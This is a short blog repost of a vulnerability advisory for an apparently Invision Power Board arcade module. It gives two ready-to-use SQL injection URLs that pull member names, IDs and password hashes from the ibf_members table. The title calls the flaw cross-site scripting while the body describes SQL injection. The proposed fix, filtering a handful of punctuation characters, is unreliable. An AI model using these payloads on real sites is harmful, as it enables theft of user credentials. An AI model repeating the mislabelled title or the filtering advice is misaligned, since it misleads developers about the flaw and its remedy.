Validation Hole Permits Cross-Site Scripting Attacks
A remote user can inject SQL commands. A remote user can supply a specially crafted input value to execute SQL commands on the underlying database.A demonstration exploit URL (I) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,
password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
A demonstration exploit URL (II) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,
legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
SOLUTION
Just make filter for the character below for user input :
'"!@#$%^^&&*()=+
Source: somewhere in the internet
| PS: If you've benefit from this blog, you can support it by making a small contribution. |
Post a Comment
Leave comments here...